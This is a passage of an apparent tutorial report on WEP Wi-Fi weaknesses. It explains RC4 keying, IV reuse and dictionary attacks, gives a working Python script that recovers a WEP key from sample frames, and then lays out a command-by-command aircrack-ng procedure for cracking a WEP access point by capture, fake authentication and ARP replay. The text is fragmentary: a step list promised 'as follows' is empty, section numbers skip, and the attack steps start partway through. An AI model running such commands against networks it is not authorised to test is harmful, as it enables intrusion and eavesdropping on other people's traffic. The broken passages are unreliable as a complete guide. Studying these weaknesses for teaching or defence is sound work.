2 Encryption Method
2.1 RC4 Encryption Method (balaji, 2006)
WEP uses a 64-bit or 128-bit key size (the 128-bit size was added in the WEP2 revision); both include a 24-bit IV (initialisation vector). Subtracting the IV leaves a 40-bit secret key (equivalent to 5 ASCII characters) in 64-bit mode and a 104-bit secret key (equivalent to 13 ASCII characters) in 128-bit mode. The IV is transmitted in the clear with every frame and is prepended to the secret key to form the RC4 seed, so only the 40 or 104 bits are actually secret.
Based on the diagram, WEP encryption proceeds step by step as follows:
Anyone who obtains the access point key can eavesdrop on traffic or even alter data on the network. An attacker can rederive the secret part of the key by analysing the initial word of the keystreams with relatively little work (Fluhrer, Mantin, & Shamir, 2001).
3.2 Dictionary-building attack that, after analysis of about a day’s worth of
traffic, allows real-time automated decryption of all traffic.
The secret key is only 40 or 104 bits (not 128: the remaining 24 bits are the public IV), yet neither size can be exhausted by brute force. What makes guessing practical is that the key is normally typed as 5 or 13 ASCII characters or derived from a passphrase, so a dictionary of commonly used words and phrases covers a large share of real keys. Such word lists often take at least 5 GB (gigabytes) of storage. A dictionary attack tries every word in turn until one matches or the list is exhausted.

The time scale in the heading comes from the 24-bit IV: only 2^24 (about 16.7 million) IV values exist, so on a busy network IVs repeat within about a day, and once the keystream for a given IV has been recovered from a known plaintext, every later frame sent under that IV can be decrypted immediately.

Against a WEP access point the attacker records encrypted frames and tries to decrypt them with each candidate key; a candidate is confirmed when the decrypted frame's integrity check value (ICV) verifies. Once a match is found, the script can automatically authenticate to the access point with the recovered key. The faster the computer can test candidate words against the captured frames, the sooner the result.
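The following is an added example, not code from the original paper or from aircrack-ng. It puts the key structure from section 2.1 and the word-list attack above into working code: RC4 and the WEP frame layout (3-byte IV sent in clear, RC4 seeded with IV || secret key, CRC-32 ICV appended to the payload before encryption) follow the standard, while the key "apple", the two frames and the word list are constructed here for illustration. Checking the ICV after a trial decryption is one way to confirm a candidate key, and XORing two frames that share an IV shows why the 24-bit IV space matters.

```python
"""WEP framing, IV reuse and a word-list attack, in one place.

Added example, not code from the original paper or from aircrack-ng. RC4 and
the WEP frame layout (3-byte IV sent in clear, RC4 seeded with IV || secret
key, CRC-32 ICV appended to the payload before encryption) follow the
standard; the key "apple", the frames and the word list are constructed here.
"""
import zlib


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Return n bytes of RC4 keystream: key-scheduling (KSA), then PRGA."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA: permute S under the key
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                         # PRGA: one output byte per step
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Body of a WEP data frame: IV || RC4(IV || key, plaintext || ICV).

    A 5-byte key gives the 40-bit ("64-bit") mode, 13 bytes the 104-bit mode.
    """
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("WEP needs a 24-bit IV and a 40- or 104-bit key")
    icv = zlib.crc32(plaintext).to_bytes(4, "little")   # ICV is CRC-32
    body = plaintext + icv
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Return the plaintext if the ICV verifies under `key`, otherwise None."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + key, len(ct)))
    pt, icv = body[:-4], body[-4:]
    if zlib.crc32(pt).to_bytes(4, "little") != icv:
        return None
    return pt


def keystream_reuse(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under the same IV are XORed with the same keystream, so
    XORing the ciphertexts cancels it and leaves plaintext_a XOR plaintext_b.
    With only 2**24 IVs this happens routinely on a busy network."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames use different IVs, keystreams differ")
    return xor(frame_a[3:], frame_b[3:])


def dictionary_attack(frame: bytes, wordlist):
    """Try each word as the 5-character (40-bit) key; a verifying ICV confirms it."""
    for word in wordlist:
        key = word.encode()
        if len(key) != 5:                      # wrong length for a 40-bit key
            continue
        if wep_decrypt(key, frame) is not None:
            return word
    return None


# Constructed sample traffic: LLC/SNAP header (0xAA 0xAA 0x03 ...) as in a
# real data frame, followed by a short payload; both frames reuse IV 01:02:03.
WEP_KEY = b"apple"                              # 5 ASCII chars = 40-bit key
IV = b"\x01\x02\x03"
PT_A = b"\xaa\xaa\x03\x00\x00\x00\x08\x00hello"
PT_B = b"\xaa\xaa\x03\x00\x00\x00\x08\x00world"
FRAME_A = wep_encrypt(WEP_KEY, IV, PT_A)
FRAME_B = wep_encrypt(WEP_KEY, IV, PT_B)
WORDLIST = ["password", "admin", "house", "apple", "zebra"]   # constructed

if __name__ == "__main__":
    print("recovered key:", dictionary_attack(FRAME_A, WORDLIST))
    print("pt_a xor pt_b:", keystream_reuse(FRAME_A, FRAME_B)[:len(PT_A)].hex())
```

Running the script recovers "apple" from the word list, and the XOR of the two same-IV frames equals the XOR of their plaintexts, which is exactly the information an eavesdropper gets for free each time an IV repeats.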
These are the steps to compromise a WEP-based access point:
d. ath0 is the wireless interface name
5. Wait until the last line of the terminal output reaches 100% (for example “09:23:39
30/30: 100%”), then proceed to the next command.
6. airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
a. -c 9 is the channel for the wireless network
b. --bssid 00:14:6C:7E:40:80 is the access point MAC address. This
filter eliminates extraneous traffic.
c. -w output is the file name prefix for the capture files that will contain the IVs.
d. ath0 is the interface name.
7. aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
a. -1 means fake authentication
b. 0 reassociation timing in seconds
c. -e teddy is the wireless network name
d. -a 00:14:6C:7E:40:80 is the access point MAC address
e. -h 00:0F:B5:88:AC:82 is our card MAC address
f. ath0 is the wireless interface name
8. aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
a. -3 means ARP request replay: a captured ARP request is retransmitted so the access point keeps generating frames with new IVs
b. -b 00:14:6C:7E:40:80 is the access point MAC address
c. -h 00:0F:B5:88:AC:82 is our card MAC address
d. ath0 is the wireless interface name
9. aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
a. -b 00:14:6C:7E:40:80 selects the one access point we are interested in.
This is optional since when we originally captured the data, we applied
a filter to only capture data for this one AP.
b. output*.cap selects all files starting with “output” and ending in “.cap”.
10. The key is now shown on the terminal (for example “KEY FOUND!
[ 12:34:56:78:90 ]”) together with the probability (for example “Probability: 98%”) that it
is the access point's key. The key is printed as hex bytes; the five bytes in this example form a 40-bit (64-bit mode) key.
5 References
balaji. (2006, December 27). Wireless Security - How WEP works. Retrieved 26 April
Fluhrer, S., Mantin, I., & Shamir, A. (2001). Weaknesses in the Key Scheduling Algorithm of RC4. In Selected Areas in Cryptography (SAC 2001), LNCS 2259. Springer, Berlin Heidelberg. https://doi.org/10.1007/3-540-45537-X_1
Aircrack-ng. Simple WEP Crack (tutorial). https://www.aircrack-ng.org/doku.php?id=simple_wep_crack